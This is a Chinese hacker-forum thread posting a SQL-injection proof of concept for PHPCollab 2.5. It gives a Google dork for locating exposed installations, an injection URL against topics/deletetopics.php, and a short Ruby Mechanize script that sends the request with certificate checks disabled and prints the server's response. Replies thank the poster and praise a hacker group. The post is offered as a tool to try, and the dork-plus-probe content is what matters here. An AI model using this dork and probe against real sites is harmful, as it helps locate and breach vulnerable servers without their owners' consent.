PHPCollab 2.5注入漏洞
Google Dork: filetype:php inurl:"/general/login.php?PHPSESSID="###################################################################################
PoC = http://127.0.0.1/phpcollab/topics/deletetopics.php?project=%27
###################################################################################
#=====================================================
require('mechanize')
agent = Mechanize.new()
agent.redirect_ok = false
agent.verify_mode = OpenSSL::SSL::VERIFY_NONE
#=====================================================
begin
html = agent.get("http://127.0.0.1/phpcollab/topics/deletetopics.php?project=%27")
rescue
else
puts(html.body())
end
#===================================================== 能不能解释一下代码。 :)拿走试试,感谢楼主 新手路过 还是不错的哦,顶了 支持中国红客联盟(ihonker.org) 加油!干倒冰儿和酒仙! 加油!干倒冰儿和酒仙! 支持中国红客联盟(ihonker.org) 感谢楼主的分享~
页:
[1]